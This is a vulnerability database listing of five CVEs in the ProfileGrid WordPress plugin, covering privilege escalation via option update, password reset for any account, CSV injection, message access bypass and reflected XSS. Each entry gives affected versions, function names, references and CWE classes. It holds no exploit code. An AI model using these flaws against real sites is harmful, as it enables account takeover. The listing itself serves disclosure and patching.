CVE-2023-3713 – ProfileGrid <= 5.5.1 - Authenticated (Subscriber+) Arbitrary Option Update
https://notcve.org/view.php?id=CVE-2023-3713
The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'profile_magic_check_smtp_connection' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. This can be used by attackers to achieve privilege escalation. • https://plugins.trac.wordpress.org/browser/profilegrid-user-profiles-groups-and-communities/tags/5.4.8/admin/class-profile-magic-admin.php#L599 https://plugins.trac.wordpress.org/changeset/2938904/profilegrid-user-profiles-groups-and-communities#file0 https://www.wordfence.com/threat-intel/vulnerabilities/id/473ba791-af99-4aae-99cb-ccf220e443e7?source=cve • CWE-862: Missing Authorization •
CVE-2023-0940 – ProfileGrid < 5.3.1 - Subscriber+ Arbitrary Password Reset
https://notcve.org/view.php?id=CVE-2023-0940
The ProfileGrid WordPress plugin before 5.3.1 provides an AJAX endpoint for resetting a user password but does not implement proper authorization. This allows a user with low privileges, such as subscriber, to change the password of any account, including Administrator ones. The ProfileGrid plugin for WordPress is vulnerable to authorization bypass due to a missing capability check in the pm_reset_user_password function in versions up to, and including, 5.3.0. This makes it possible for authenticated attackers, with subscriber-level access or higher, to change the passwords of any user. • https://wpscan.com/vulnerability/56744f72-2d48-4f42-8195-24b4dd951bb5 • CWE-862: Missing Authorization CWE-863: Incorrect Authorization •
CVE-2022-41791 – WordPress ProfileGrid plugin <= 5.1.6 - Auth. CSV Injection vulnerability
https://notcve.org/view.php?id=CVE-2022-41791
Auth. (subscriber+) CSV Injection vulnerability in ProfileGrid plugin <= 5.1.6 on WordPress. Vulnerabilidad de inyección CSV autenticada (con permisos de suscriptor o superiores) en el complemento ProfileGrid en Wordpress en versiones <= 5.1.6. The ProfileGrid plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 5.1.6, via the 'pm_get_csv_single_user_row' function. This allows subscriber-level attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration. • https://patchstack.com/database/vulnerability/profilegrid-user-profiles-groups-and-communities/wordpress-profilegrid-plugin-5-1-6-csv-injection-vulnerability?_s_id=cve • CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') CWE-1236: Improper Neutralization of Formula Elements in a CSV File •
CVE-2022-36352 – WordPress ProfileGrid Plugin <= 5.0.3 is vulnerable to Broken Access Control
https://notcve.org/view.php?id=CVE-2022-36352
Missing Authorization vulnerability in Profilegrid ProfileGrid – User Profiles, Memberships, Groups and Communities.This issue affects ProfileGrid – User Profiles, Memberships, Groups and Communities: from n/a through 5.0.3. Vulnerabilidad de autorización faltante en Profilegrid ProfileGrid: perfiles de usuario, membresías, grupos y comunidades. Este problema afecta a ProfileGrid: perfiles de usuario, membresías, grupos y comunidades: desde n/a hasta 5.0.3. The ProfileGrid – User Profiles, Memberships, Groups and Communities plugin for WordPress is vulnerable to authorization bypass due to a missing capability check when accessing messages in versions up to, and including, 5.0.3. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to obtain access to arbitrary messages with read and edit capabilities. • https://patchstack.com/database/vulnerability/profilegrid-user-profiles-groups-and-communities/wordpress-profilegrid-plugin-5-0-3-broken-access-control-vulnerability?_s_id=cve • CWE-862: Missing Authorization •
CVE-2022-3578 – ProfileGrid < 5.1.1 - Reflected Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2022-3578
The ProfileGrid WordPress plugin before 5.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting El complemento ProfileGrid de WordPress anterior a 5.1.1 no desinfecta ni escapa un parámetro antes de devolverlo a la página, lo que genera una Cross-Site Scripting reflejada. The ProfileGrid plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in versions up to, and including, 5.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. • https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •